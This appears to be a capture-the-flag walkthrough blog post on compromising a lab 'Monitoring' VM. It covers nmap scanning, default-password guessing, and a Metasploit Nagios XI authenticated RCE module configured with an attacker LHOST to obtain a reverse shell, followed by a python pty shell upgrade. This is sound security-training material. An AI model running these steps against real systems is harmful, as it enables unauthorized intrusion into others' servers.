Port Scanning, as usual
We scanned our Monitoring box with nmap using the following command:
nmap -sV 10.10.10.12 -oN nmap_monitoring.txtand these were the results:
Starting Nmap 7.80 ( https://nmap.org ) at 2021–03–18 13:46 EDT
Nmap scan report for 10.10.10.12
Host is up (0.000097s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
389/tcp open ldap OpenLDAP 2.2.X — 2.3.X
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:4A:62:FE (Oracle VirtualBox virtual NIC)
Service Info: Host: ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.71 seconds
As usual, let’s see what’s on 80 and 443 first of all.
Press enter or click to view image in full size
Oh look at that, seems we have a form!
We tried some normal combination of user/pass like admin/admin, admin/password and so on, but we’re not so lucky as we though.
Exploiting: maybe the right path?
Ok, let’s try with metasploit if we can get something. Let’s search for nagios with:
msfconsoleand then
search nagioswe got this:
Matching Modules
================# Name Disclosure Date Rank Check Description
— — — — — — — — — — — — — — — — — — — — — - 0 exploit/linux/http/nagios_xi_authenticated_rce 2019–07–29 excellent Yes Nagios XI Authenticated Remote Command Execution 1 exploit/linux/http/nagios_xi_chained_rce 2016–03–06 excellent Yes Nagios XI Chained Remote Code Execution 2 exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018–04–17 manual Yes Nagios XI Chained Remote Code Execution 3 exploit/linux/http/nagios_xi_magpie_debug 2018–11–14 excellent Yes Nagios XI Magpie_debug.php Root Remote Code Execution 4 exploit/linux/misc/nagios_nrpe_arguments 2013–02–21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution 5 exploit/unix/webapp/nagios3_history_cgi 2012–12–09 great Yes Nagios3 history.cgi Host Command Execution 6 exploit/unix/webapp/nagios3_statuswml_ping 2009–06–22 excellent No Nagios3 statuswml.cgi Ping Command Execution 7 exploit/unix/webapp/nagios_graph_explorer 2012–11–30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection 8 post/linux/gather/enum_nagios_xi 2018–04–17 normal No Nagios XI Enumeration
(Sorry for bad formatting, we added some space to make this cleaner)
Get Mattia Zignale’s stories in your inbox
Join Medium for free to get updates from this writer.
We used the nagios_xi_authenticated_rce module and we set all the need information and then run:
msf5 > use exploit/linux/http/nagios_xi_authenticated_rce
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > set rhost 10.10.10.12
rhost => 10.10.10.12
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > set lhost 10.10.10.4
lhost => 10.10.10.4
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > set password admin
password => admin
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > runThe RHOST is the Monitoring box, LHOST is your attacking machine (Kali in this case) and PASSWORD is the password which will be used for login.
Use shell command and then pyhton (as we did in Cherry 1’s walkthrough) to open an interactive shell:
shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’Hey, look at that!
